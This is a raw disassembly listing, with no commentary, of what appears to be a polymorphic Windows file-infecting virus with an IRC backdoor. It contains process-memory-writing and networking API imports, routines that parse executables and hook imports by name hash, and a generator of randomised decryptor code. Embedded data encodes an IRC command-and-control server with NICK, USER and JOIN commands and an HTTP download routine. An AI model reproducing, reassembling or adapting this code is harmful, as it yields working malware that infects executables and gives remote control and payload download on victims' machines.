aNtwritevirtual db 'NtWriteVirtualMemory',0
aRtlunicodestri db 'RtlUnicodeStringToAnsiString',0
aWsastartup db 'WSAStartup',0
aClosesocket db 'closesocket',0
aConnect db 'connect',0
aGethostbyname db 'gethostbyname',0
aRecv db 'recv',0
aSend db 'send',0
aSocket db 'socket',0
aInternetcloseh db 'InternetCloseHandle',0
aInternetgetcon db 'InternetGetConnectedState',0
aInternetopena db 'InternetOpenA',0
aInternetopenur db 'InternetOpenUrlA',0
aInternetreadfi db 'InternetReadFile',0
aAdvapi32_dll db 'ADVAPI32.DLL',0
aRegclosekey db 'RegCloseKey',0
aRegopenkeyexa db 'RegOpenKeyExA',0
aRegqueryvaluee db 'RegQueryValueExA',0
aRegsetvalueexa db 'RegSetValueExA',0
; =============== S U B R O U T I N E =======================================
sub_31428BF1 proc near ; CODE XREF: UPX2:31428C98�p
; UPX2:31428CA9�p ...
var_5 = byte ptr -5
sub ecx, 5
sub ecx, eax
push ecx
push 0E8000000h
lea ecx, [esp+8+var_5]
push 0
push 5
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
push esp
push 40h
push ecx
push edx
push ebx
call dword ptr [ebp+4035F0h]
add esp, 0Ch
call dword ptr [ebp+4035F4h]
add esp, 8
retn
sub_31428BF1 endp
; ---------------------------------------------------------------------------
push edi
lea eax, [ebp+4015B1h]
xor edi, edi
push eax
push 0
push 0Eh
call dword ptr [ebp+4035A4h]
test eax, eax
jz loc_31428CD4
push eax
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 100000h
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push ebx
push eax
call dword ptr [ebp+4035E4h]
pop edi
pop ecx
call dword ptr [ebp+40353Ch]
test edi, edi
jz short loc_31428CD4
mov ecx, [ebp+401588h]
jecxz short loc_31428C8C
lea edx, [ebp+401000h]
add edx, ecx
push edi
push ebx
call edx
loc_31428C8C: ; CODE XREF: UPX2:31428C7E�j
mov eax, [ebp+4035D4h]
lea ecx, [edi+2394h]
call sub_31428BF1
mov eax, [ebp+4035E8h]
lea ecx, [edi+23E1h]
call sub_31428BF1
mov eax, [ebp+4035D8h]
lea ecx, [edi+23E8h]
call sub_31428BF1
mov eax, [ebp+4035DCh]
test eax, eax
jz short loc_31428CD4
lea ecx, [edi+23F5h]
call sub_31428BF1
loc_31428CD4: ; CODE XREF: UPX2:31428C3E�j
; UPX2:31428C76�j ...
mov eax, edi
pop edi
retn
; ---------------------------------------------------------------------------
push ebp
call $+5
pop ebp
sub ebp, 401A14h
xor ecx, ecx
lea eax, [ebp+401DAEh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+40356Ch]
xchg eax, [esp]
call dword ptr [ebp+40353Ch]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h
dd 0E8h, 0ED815D00h, 401A43h, 958DFF6Ah, 401A0Eh, 20CD5250h
dd 2A0024h, 660CC483h, 1A5485C7h, 20CD0040h, 1A5685C7h
dd 240040h, 0C35D002Ah, 16A016Ah, 73FF33FFh, 8515FF04h
dd 68F074C0h, 0Bh, 35BD08Bh, 0B58D3C50h, 401A72h, 10CBA8Bh
dd 8A8B0000h, 108h, 0CB2BF803h, 0F3CB8B60h, 57461A6h, 0EBF5E247h
dd 0FC783C2h, 53D48B57h, 5450CC8Bh, 5251406Ah, 95FFFF6Ah
dd 4035F0h, 8B0CC483h, 40357495h, 83D72B00h, 7C707EAh
dd 0E8006Ah, 0C3035789h, 0E8581A6Ah, 9, 0AA61428Dh, 0F075C9FEh
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_31428DB9 proc near ; CODE XREF: sub_31429624+1B�p
; sub_3142979C+3�p ...
imul edx, [ebp+403646h], 8088405h
inc edx
mov [ebp+403646h], edx
mul edx
retn
sub_31428DB9 endp
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B09ED81h, 9D8B0040h, 40364Ah, 8247C83h
dd 0B9840F00h, 81000000h, 208ECh, 4685400h, 0FF000001h
dd 40359095h, 8DFC8B00h, 1042484h, 6A500000h, 4E800h, 52560000h
dd 0FF570054h, 40358C95h, 8DC93300h, 10497h, 6A515100h
dd 16A5102h, 68h, 95FF5240h, 40355Ch, 74F68596h, 6854505Bh
dd 104h, 24B4FF57h, 220h, 362895FFh, 85590040h, 0E31674C0h
dd 0D48B5014h, 5152006Ah, 95FF5657h, 4035CCh, 75C08559h
dd 95FF56D0h, 40353Ch, 5244578Dh, 58446A57h, 104978Dh
dd 33AB0000h, 59106AC0h, 5050ABF3h, 50505050h, 95FF5250h
dd 403564h, 208C481h, 74FF0000h, 95FF0824h, 403618h, 1895FF53h
dd 5D004036h, 800004C2h, 1750A3Eh, 848D8B46h, 0E3004015h
dd 958D19h, 3004010h, 0D2FF56D1h, 880FC084h, 11Fh, 110840Fh
dd 3E800000h, 4610753Ah, 0F003E80h, 10184h, 203E8000h
dd 8146F175h, 4E49503Eh, 8B427547h, 146C6CFh, 51CE2B4Fh
dd 5651006Ah, 1095FF53h, 59004036h, 850FC13Bh, 0DFh, 1DA2858Dh
dd 6A0040h, 0C68h, 0FF535000h, 40361095h, 0C3D00h, 850F0000h
dd 0BFh, 0B1E9h, 503E8100h, 0F564952h, 0A585h, 8C68300h
dd 0F0D3CACh, 9984h, 75203C00h, 3A3CACF3h, 8C850Fh, 0DAD0000h
dd 20202020h, 6567213Dh, 0AC7F7574h, 7C75203Ch, 20FF7E81h
dd 75747468h, 37E8171h, 2F2F3A70h, 47C66875h, 310F00FFh
dd 2710BAh, 52E2F700h, 35BC95FFh, 0C0330040h, 50505050h
dd 9E8h, 776F4400h, 616F6C6Eh, 95FF0064h, 403620h, 3674C085h
dd 8589C933h, 40364Ah, 2006851h, 51518000h, 95FF5056h
dd 403624h, 1B03958Dh, 33500040h, 505154C9h, 0FF515152h
dd 40356C95h, 24048700h, 353C95FFh, 0C3F80040h, 15778D80h
dd 0F9010040h, 464F53C3h, 52415754h, 694D5C45h, 736F7263h
dd 5C74666Fh, 646E6957h, 5C73776Fh, 72727543h, 56746E65h
dd 69737265h, 455C6E6Fh, 6F6C7078h, 726572h, 67726154h
dd 6F487465h, 2007473h, 4FF0FF00h, 7018D384h, 69786F72h
dd 72692E6Dh, 6C616763h, 2E797861h, 4E006C70h, 204B4349h
dd 6B7A6268h, 726E7174h, 4553550Ah, 30732052h, 30353032h
dd 202E2031h, 2D3A202Eh, 4E494F4Ah, 69762620h, 0A757472h
dd 0E855h, 815D0000h, 401DB4EDh, 7785C600h, 4015h, 359495FFh
dd 0E8C10040h, 6A3C741Fh, 50B58B1Eh, 59004035h, 752E3CACh
dd 3E81662Ah, 23751DFFh, 3640BD8Dh, 768B0040h, 66A55702h
dd 6A858DA5h, 8F004033h, 40339085h, 4689FA00h, 0FE4E8CFAh
dd 0E201B1FBh, 8D43EBCFh, 4015B185h, 6A5000h, 95FF0E6Ah
dd 4035A4h, 8247C83h, 0E82B7504h, 4, 434653h, 358895FFh
dd 48E80040h, 0E8FFFFFCh, 7, 5F434653h, 0FF00534Fh, 40358895h
dd 0FC31E800h, 56E8FFFFh, 0FFFFFFF3h, 4013038Dh, 0BE800h
dd 53550000h, 32335245h, 4C4C442Eh, 9C95FF00h, 0E8004035h
dd 0Ah, 72707377h, 66746E69h, 0FF500041h, 40354895h, 54858900h
dd 0F004035h, 0E08D8D31h, 89004018h, 40364685h, 95FF5100h
dd 40359Ch, 46893h, 0B58D0000h, 4018EDh, 2CBD8D59h, 0E8004036h
dd 0FFFFF6D6h, 6785C766h, 0FF00401Dh, 69A583F0h, 401Dh
dd 1D27958Dh, 54500040h, 6A016Ah, 26852h, 95FF8000h, 403630h
dd 755AC085h, 5A8D8D22h, 5200401Dh, 0B58D066Ah, 401D67h
dd 50505654h, 95FF5251h, 403634h, 2C95FF58h, 0C6004036h
dd 40384D85h, 0CE80000h, 57000000h, 4B434F53h, 442E3233h
dd 0FF004C4Ch, 40359C95h, 7689300h, 8D000000h, 401844B5h
dd 0BD8D5900h, 4035FCh, 0FFF651E8h, 0CE8FFh, 49570000h
dd 454E494Eh, 4C442E54h, 95FF004Ch, 40359Ch, 840FC085h
dd 1E7h, 56893h, 0B58D0000h, 401882h, 18BD8D59h, 0E8004036h
dd 0FFFFF61Ah, 361CBD83h, 0F000040h, 1C284h, 90EC8100h
dd 54000001h, 10168h, 0FC95FF00h, 81004035h, 190C4h, 0D48B5000h
dd 0FF52006Ah, 40361C95h, 59C08500h, 88680D75h, 0FF000013h
dd 4035BC95h, 83E2EB00h, 401D69BDh, 29750000h, 1D6D858Dh
dd 0FF500040h, 40360895h, 0FC08500h, 13B84h, 0C408B00h
dd 30FF008Bh, 1D69858Fh, 85C60040h, 40384Dh, 6A006A01h
dd 0FF026A01h, 40361495h, 0FFF88300h, 112840Fh, 8D930000h
dd 401D6595h, 52106A00h, 495FF53h, 85004036h, 0F2850FC0h
dd 8D000000h, 401D86BDh, 0E808B100h, 0FFFFFABCh, 9468h
dd 0E62B5E00h, 54243489h, 359895FFh, 0BD8D0040h, 401D94h
dd 9DE801B1h, 8BFFFFFAh, 0C1102444h, 440B08E0h, 0E0C10424h
dd 24440B08h, 5E85008h, 25000000h, 78362Eh, 5495FF57h
dd 83004035h, 47C60CC4h, 958D2006h, 401D81h, 2168006Ah
dd 52000000h, 1095FF53h, 8D004036h, 5714247Ch, 355895FFh
dd 4C60040h, 6A400A38h, 53575000h, 361095FFh, 0E6030040h
dd 1DA2BD8Dh, 6A0040h, 0C68h, 0FF535700h, 40361095h, 0C3D00h
dd 4D750000h, 364EB58Dh, 8D8D0040h, 40384Dh, 6ACE2Bh, 0FF535651h
dd 40360C95h, 0F88300h, 8B912F7Eh, 4EB58DFEh, 0B0004036h
dd 75AEF20Dh, 0F8E86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 4EBD8DCEh, 0F3004036h, 0EBF787A4h, 95FF53B9h
dd 403600h, 1577BD80h, 74010040h, 7530682Ah, 95FF0000h
dd 4035BCh, 384DBD80h, 74000040h, 6985C711h, 401Dh, 0C6000000h
dd 40384D85h, 56E90000h, 0C7FFFFFEh, 40158085h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 7AB40A0Dh
dd 79ED050Bh, 52484FD4h, 84044037h, 0FAE530C7h, 142927B1h
dd 0CC5C10A6h, 0AD47C26Ch, 59576299h, 0C17E3AABh, 0F96A1A73h
dd 1413606Eh, 69C910A6h, 131E53AFh, 0B352EDBBh, 56A8D8B8h
dd 0A703h, 0Fh dup(0)
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_3142956E proc near ; CODE XREF: sub_314295B5:loc_31429612�p
; sub_31429675+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+4039A6h], 0
and dword ptr [ebp+4039AAh], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3142958A: ; CODE XREF: sub_3142956E+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_314295AC
cmp eax, [edx+8]
jnb short loc_314295AC
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+4039A6h], edx
mov [ebp+4039AAh], eax
jmp short loc_314295B1
; ---------------------------------------------------------------------------
loc_314295AC: ; CODE XREF: sub_3142956E+23�j
; sub_3142956E+28�j
add edx, 28h
loop loc_3142958A
loc_314295B1: ; CODE XREF: sub_3142956E+3C�j
popa
retn 4
sub_3142956E endp
; =============== S U B R O U T I N E =======================================
sub_314295B5 proc near ; CODE XREF: UPX2:314298E1�p
; UPX2:31429907�p
mov [ebp+4022F7h], al
call sub_31429624
push 20h
lea eax, [ebp+402224h]
pop ecx
loc_314295CC: ; CODE XREF: sub_314295B5+1E�j
cmp [eax], ebx
jz short loc_314295DC
add eax, 4
loop loc_314295CC
inc dword ptr [ebp+40398Eh]
retn
; ---------------------------------------------------------------------------
loc_314295DC: ; CODE XREF: sub_314295B5+19�j
neg ecx
add ecx, [ebp+4022F7h]
jecxz short loc_314295F6
loc_314295E6: ; CODE XREF: sub_314295B5+39�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_314295E6
mov [ebp+402224h], ebx
loc_314295F6: ; CODE XREF: sub_314295B5+2F�j
; sub_31429624+34�j
cmp dword ptr [edx], 0
jz short loc_31429600
sub esi, [edx]
add esi, [edx+10h]
loc_31429600: ; CODE XREF: sub_314295B5+44�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3142960F
push dword ptr [edx]
jmp short loc_31429612
; ---------------------------------------------------------------------------
loc_3142960F: ; CODE XREF: sub_314295B5+54�j
push dword ptr [edx+10h]
loc_31429612: ; CODE XREF: sub_314295B5+58�j
call sub_3142956E
sub ecx, esi
sub ecx, [ebp+4039AAh]
pop eax
add ecx, [ebx+34h]
retn
sub_314295B5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429624 proc near ; CODE XREF: sub_314295B5+6�p
pop dword ptr [ebp+403992h]
mov dword ptr [ebp+40398Eh], 0
call sub_31429675
mov eax, [ebp+40398Eh]
call sub_31428DB9
call sub_31429661
cmp dword ptr [ebp+40398Eh], 0
jnz short loc_3142965A
mov [ebp+4022A0h], ebx
jmp short loc_314295F6
; ---------------------------------------------------------------------------
loc_3142965A: ; CODE XREF: sub_31429624+2C�j
dec dword ptr [ebp+40398Eh]
retn
sub_31429624 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429661 proc near ; CODE XREF: sub_31429624+20�p
pop dword ptr [ebp+403992h]
mov [ebp+40398Eh], edx
call sub_31429675
xor ecx, ecx
retn
sub_31429661 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31429675 proc near ; CODE XREF: sub_31429624+10�p
; sub_31429661+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3142956E
add edx, [ebp+4039AAh]
add edx, esi
loc_31429689: ; CODE XREF: sub_31429675+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3142979A
cmp dword ptr [edx+10h], 0
jz locret_3142979A
mov eax, [edx+0Ch]
push eax
call sub_3142956E
add eax, [ebp+4039AAh]
add eax, esi
push eax
loc_314296AF: ; CODE XREF: sub_31429675+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_314296CF
cmp cl, 2Eh
jz short loc_314296BE
loc_314296BB: ; CODE XREF: sub_31429675+58�j
inc eax
jmp short loc_314296AF
; ---------------------------------------------------------------------------
loc_314296BE: ; CODE XREF: sub_31429675+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_314296BB
loc_314296CF: ; CODE XREF: sub_31429675+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_31429792
cmp word ptr [eax-2], 3233h
jnz loc_31429792
push esi
cmp dword ptr [edx], 0
jnz short loc_314296F2
mov ecx, [edx+10h]
jmp short loc_314296F4
; ---------------------------------------------------------------------------
loc_314296F2: ; CODE XREF: sub_31429675+76�j
mov ecx, [edx]
loc_314296F4: ; CODE XREF: sub_31429675+7B�j
add esi, ecx
push ecx
call sub_3142956E
add esi, [ebp+4039AAh]
loc_31429702: ; CODE XREF: sub_31429675+90�j
; sub_31429675+117�j
lodsd
test eax, eax
js short loc_31429702
jz loc_31429791
push dword ptr [ebp+4039AAh]
push eax
call sub_3142956E
add eax, [ebp+4039AAh]
pop dword ptr [ebp+4039AAh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3142972E: ; CODE XREF: sub_31429675+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_31429745
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3142972E
; ---------------------------------------------------------------------------
loc_31429745: ; CODE XREF: sub_31429675+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3142978B
cmp ebx, 0DB6E45A8h
jz short loc_3142978B
cmp ebx, 0FFA13B59h
jz short loc_3142978B
cmp ebx, 0ACB522D6h
jz short loc_3142978B
cmp ebx, 0F358E993h
jz short loc_3142978B
cmp ebx, 0F358E97Dh
jz short loc_3142978B
cmp ebx, 0E1253F46h
jz short loc_3142978B
cmp ebx, 0E1253F30h
jz short loc_3142978B
call dword ptr [ebp+403992h]
loc_3142978B: ; CODE XREF: sub_31429675+D6�j
; sub_31429675+DE�j ...
pop ebx
jmp loc_31429702
; ---------------------------------------------------------------------------
loc_31429791: ; CODE XREF: sub_31429675+92�j
pop esi
loc_31429792: ; CODE XREF: sub_31429675+60�j
; sub_31429675+6C�j
add edx, 14h
jmp loc_31429689
; ---------------------------------------------------------------------------
locret_3142979A: ; CODE XREF: sub_31429675+18�j
; sub_31429675+22�j
retn
sub_31429675 endp
; ---------------------------------------------------------------------------
db 1
; =============== S U B R O U T I N E =======================================
sub_3142979C proc near ; CODE XREF: UPX2:314298DA�p
; UPX2:31429900�p
push 4
pop eax
call sub_31428DB9
mov [ebp+4024D1h], dl
mov ax, 1831h
add ah, dl
shl ah, 3
add ah, dl
stosw
push 6
pop eax
call sub_31428DB9
add edx, 8
xchg edx, ecx
loc_314297C4: ; CODE XREF: sub_3142979C:loc_31429803�j
push 5
pop eax
call sub_31428DB9
cmp dl, 3
jnb short loc_314297DC
mov al, 50h
add al, [ebp+4024D1h]
stosb
jmp short loc_31429803
; ---------------------------------------------------------------------------
loc_314297DC: ; CODE XREF: sub_3142979C+33�j
push 68h
pop eax
stosb
cmp dl, 3
jnz short loc_314297FD
mov al, 11h
call sub_31428DB9
mov eax, 1
loc_314297F1: ; CODE XREF: sub_3142979C+5D�j
test dl, dl
jz short loc_31429802
shl eax, 1
dec dl
jmp short loc_314297F1
; ---------------------------------------------------------------------------
jmp short loc_31429802
; ---------------------------------------------------------------------------
loc_314297FD: ; CODE XREF: sub_3142979C+47�j
mov eax, 80000000h
loc_31429802: ; CODE XREF: sub_3142979C+57�j
; sub_3142979C+5F�j
stosd
loc_31429803: ; CODE XREF: sub_3142979C+3E�j
loop loc_314297C4
retn
sub_3142979C endp
; ---------------------------------------------------------------------------
loc_31429806: ; CODE XREF: sub_3142A260+112�p
lea edi, [ebp+40343Ch]
test dword ptr [ebp+403431h], 80000000h
jz short loc_3142981B
mov al, 60h
stosb
loc_3142981B: ; CODE XREF: UPX2:31429816�j
test dword ptr [ebp+403431h], 1000003h
jz loc_31429921
; ---------------------------------------------------------------------------
db 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EECC43DFh
xchg eax, esi
cmp [eax+0], eax
mov al, 0E8h
stosb
stosd
test dword ptr [ebp+403431h], 1000000h
mov [ebp+40399Ah], edi
jz short loc_31429899
test dword ptr [ebp+403431h], 2000000h
mov eax, 36FF6467h
jnz short loc_31429864
mov eax, 2E8B6467h
loc_31429864: ; CODE XREF: UPX2:3142985D�j
stosd
mov ax, 0
stosw
jz short loc_31429870
mov al, 5Dh
stosb
loc_31429870: ; CODE XREF: UPX2:3142986B�j
test dword ptr [ebp+403431h], 8000000h
mov eax, 86D8Dh
jnz short loc_31429897
test dword ptr [ebp+403431h], 4000000h
mov eax, 8C583h
jz short loc_31429897
mov eax, 0F8ED83h
loc_31429897: ; CODE XREF: UPX2:3142987F�j
; UPX2:31429890�j
stosd
dec edi
loc_31429899: ; CODE XREF: UPX2:3142984C�j
test dword ptr [ebp+403431h], 3
jz short loc_314298A9
mov al, 0E9h
stosb
stosd
loc_314298A9: ; CODE XREF: UPX2:314298A3�j
mov eax, [ebp+403996h]
mov ecx, edi
sub ecx, eax
mov [eax-4], ecx
test dword ptr [ebp+403431h], 3
jz short loc_31429921
mov eax, 36FF6467h
mov [ebp+40399Eh], edi
stosd
mov eax, 64670000h
stosd
mov eax, 2689h
stosd
call sub_3142979C
mov al, 20h
call sub_314295B5
jecxz short loc_31429921
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
mov edx, [ebp+403431h]
not edx
test edx, 3
jnz short loc_31429914
call sub_3142979C
mov al, 1Fh
call sub_314295B5
mov ax, 15FFh
stosw
xchg eax, ecx
stosd
loc_31429914: ; CODE XREF: UPX2:314298FE�j
mov ecx, edi
mov eax, [ebp+40399Eh]
sub ecx, eax
mov [eax-4], ecx
loc_31429921: ; CODE XREF: UPX2:31429825�j
; UPX2:314298C0�j ...
test dword ptr [ebp+403431h], 4
jz short loc_3142993F
mov eax, 0C8FEC029h
stosd
mov eax, 474C008h
stosd
mov eax, 67EBF875h
stosd
loc_3142993F: ; CODE XREF: UPX2:3142992B�j
test dword ptr [ebp+403431h], 8
jnz short loc_31429995
cmp byte ptr [ebp+40342Fh], 0
jz short loc_31429995
mov eax, 0C9291829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosd
mov al, 0B1h
stosb
mov al, [ebp+40342Fh]
stosb
mov al, 40h
or al, [ebp+40342Bh]
stosb
mov ax, 0FDE2h
test dword ptr [ebp+403431h], 10h
jz short loc_31429993
mov al, 49h
stosb
mov ax, 0FC75h
loc_31429993: ; CODE XREF: UPX2:3142998A�j
stosw
loc_31429995: ; CODE XREF: UPX2:31429949�j
; UPX2:31429952�j
mov al, 0E8h
stosb
xor eax, eax
stosd
mov [ebp+403982h], edi
test dword ptr [ebp+403431h], 20h
jnz short loc_314299B6
mov al, 58h
or al, [ebp+403429h]
stosb
loc_314299B6: ; CODE XREF: UPX2:314299AB�j
mov ax, 0C081h
test dword ptr [ebp+403431h], 40h
jz short loc_314299C9
add ah, 28h
loc_314299C9: ; CODE XREF: UPX2:314299C4�j
or ah, [ebp+403429h]
stosw
mov [ebp+403986h], edi
stosd
test dword ptr [ebp+403431h], 40000000h
jnz short loc_314299ED
mov al, 50h
add al, [ebp+403429h]
stosb
loc_314299ED: ; CODE XREF: UPX2:314299E2�j
test dword ptr [ebp+403431h], 80h
jnz short loc_31429A04
mov al, 0B8h
or al, [ebp+40342Ah]
stosb
jmp short loc_31429A41
; ---------------------------------------------------------------------------
loc_31429A04: ; CODE XREF: UPX2:314299F7�j
mov ax, 1831h
test dword ptr [ebp+403431h], 100h
jz short loc_31429A16
mov al, 29h
loc_31429A16: ; CODE XREF: UPX2:31429A12�j
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
mov ax, 0F081h
test dword ptr [ebp+403431h], 200h
jnz short loc_31429A39
mov ah, 0C8h
loc_31429A39: ; CODE XREF: UPX2:31429A35�j
or ah, [ebp+40342Ah]
stosw
loc_31429A41: ; CODE XREF: UPX2:31429A02�j
mov [ebp+4039A2h], edi
mov eax, 243Ch
stosd
test dword ptr [ebp+403431h], 8
jz short loc_31429AC5
test dword ptr [ebp+403431h], 400h
jnz short loc_31429A70
mov al, 0B8h
or al, [ebp+40342Bh]
stosb
jmp short loc_31429ABD
; ---------------------------------------------------------------------------
loc_31429A70: ; CODE XREF: UPX2:31429A63�j
test dword ptr [ebp+403431h], 800h
jnz short loc_31429A8D
mov ax, 0E083h
or ah, [ebp+40342Bh]
stosw
xor eax, eax
stosb
jmp short loc_31429AA2
; ---------------------------------------------------------------------------
loc_31429A8D: ; CODE XREF: UPX2:31429A7A�j
mov ax, 1829h
or ah, [ebp+40342Bh]
shl ah, 3
or ah, [ebp+40342Bh]
stosw
loc_31429AA2: ; CODE XREF: UPX2:31429A8B�j
test dword ptr [ebp+403431h], 1000h
mov ax, 0C081h
jz short loc_31429AB5
add ah, 8
loc_31429AB5: ; CODE XREF: UPX2:31429AB0�j
or ah, [ebp+40342Bh]
stosw
loc_31429ABD: ; CODE XREF: UPX2:31429A6E�j
movzx eax, byte ptr [ebp+40342Fh]
stosd
loc_31429AC5: ; CODE XREF: UPX2:31429A57�j
test dword ptr [ebp+403431h], 40000000h
jz short loc_31429ADA
mov al, 50h
add al, [ebp+403429h]
stosb
loc_31429ADA: ; CODE XREF: UPX2:31429ACF�j
test dword ptr [ebp+403431h], 2000h
mov al, 86h
jnz short loc_31429AEA
add al, 4
loc_31429AEA: ; CODE XREF: UPX2:31429AE6�j
lea ecx, [edi-2]
mov ah, [ebp+403429h]
mov [ebp+40398Ah], ecx
stosw
cmp ah, 5
jnz short loc_31429B07
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429B07: ; CODE XREF: UPX2:31429AFE�j
test dword ptr [ebp+403431h], 4000h
mov ax, 3166h
jnz short loc_31429B19
mov ah, 29h
loc_31429B19: ; CODE XREF: UPX2:31429B15�j
stosw
mov al, 18h
or al, [ebp+40342Bh]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+403431h], 8000h
jnz short loc_31429B37
mov al, 86h
loc_31429B37: ; CODE XREF: UPX2:31429B33�j
mov ah, [ebp+403429h]
stosw
cmp ah, 5
jnz short loc_31429B4B
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_31429B4B: ; CODE XREF: UPX2:31429B42�j
test dword ptr [ebp+403431h], 10000h
jnz short loc_31429B62
mov al, 40h
or al, [ebp+403429h]
stosb
jmp short loc_31429B71
; ---------------------------------------------------------------------------
loc_31429B62: ; CODE XREF: UPX2:31429B55�j
mov ax, 0C083h
or ah, [ebp+403429h]
stosw
mov al, 1
stosb
loc_31429B71: ; CODE XREF: UPX2:31429B60�j
test dword ptr [ebp+403431h], 20000h
jnz short loc_31429BAC
test dword ptr [ebp+403431h], 40000h
jnz short loc_31429BA3
mov al, 0C0h
or al, [ebp+40342Bh]
mov ah, [ebp+403430h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_31429BAB
; ---------------------------------------------------------------------------
loc_31429BA3: ; CODE XREF: UPX2:31429B87�j
mov al, 40h
or al, [ebp+40342Bh]
loc_31429BAB: ; CODE XREF: UPX2:31429BA1�j
stosb
loc_31429BAC: ; CODE XREF: UPX2:31429B7B�j
test dword ptr [ebp+403431h], 80000h
jnz short loc_31429BC8
mov ax, 0E883h
or ah, [ebp+40342Ah]
stosw
mov al, 1
jmp short loc_31429BD0
; ---------------------------------------------------------------------------
loc_31429BC8: ; CODE XREF: UPX2:31429BB6�j
mov al, 48h
or al, [ebp+40342Ah]
loc_31429BD0: ; CODE XREF: UPX2:31429BC6�j
stosb
test dword ptr [ebp+403431h], 100000h
mov cl, 75h
jnz short loc_31429C04
mov ax, 0F883h
or ah, [ebp+40342Ah]
stosw
xor eax, eax
stosb
sub [ebp+40398Ah], edi
test dword ptr [ebp+403431h], 200000h
jnz short loc_31429C1F
mov cl, 77h
jmp short loc_31429C1F
; ---------------------------------------------------------------------------
loc_31429C04: ; CODE XREF: UPX2:31429BDD�j
mov ax, 1809h
or ah, [ebp+40342Ah]
shl ah, 3
or ah, [ebp+40342Ah]
stosw
sub [ebp+40398Ah], edi
loc_31429C1F: ; CODE XREF: UPX2:31429BFE�j
; UPX2:31429C02�j
mov al, cl
mov ah, [ebp+40398Ah]
stosw
mov al, 58h
add al, [ebp+403429h]
stosb
test dword ptr [ebp+403431h], 1000003h
jz loc_31429CC9
mov eax, 268B6467h
mov ecx, [ebp+403431h]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_31429C60
mov eax, 2E876467h
loc_31429C60: ; CODE XREF: UPX2:31429C59�j
stosd
mov eax, 0
stosw
jnz short loc_31429C70
mov ax, 0E58Bh
stosw
loc_31429C70: ; CODE XREF: UPX2:31429C68�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+403431h], 1000000h
jnz short loc_31429CC6
test dword ptr [ebp+403431h], 8000000h
jz short loc_31429CB8
mov ax, 6C8Dh
test dword ptr [ebp+403431h], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_31429CB3
mov ax, 424h
stosw
jmp short loc_31429CC6
; ---------------------------------------------------------------------------
loc_31429CB3: ; CODE XREF: UPX2:31429CA9�j
mov al, 8
stosb
jmp short loc_31429CC6
; ---------------------------------------------------------------------------
loc_31429CB8: ; CODE XREF: UPX2:31429C90�j
mov ax, 5D58h
add al, [ebp+40342Bh]
stosw
jmp short loc_31429CC9
; ---------------------------------------------------------------------------
loc_31429CC6: ; CODE XREF: UPX2:31429C84�j
; UPX2:31429CB1�j ...
mov al, 0C9h
stosb
loc_31429CC9: ; CODE XREF: UPX2:31429C3C�j
; UPX2:31429CC4�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_31429CF5
mov al, 7
sub al, [ebp+403429h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403429h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_31429CF5: ; CODE XREF: UPX2:31429CD3�j
mov ax, 0E0FFh
or ah, [ebp+403429h]
stosw
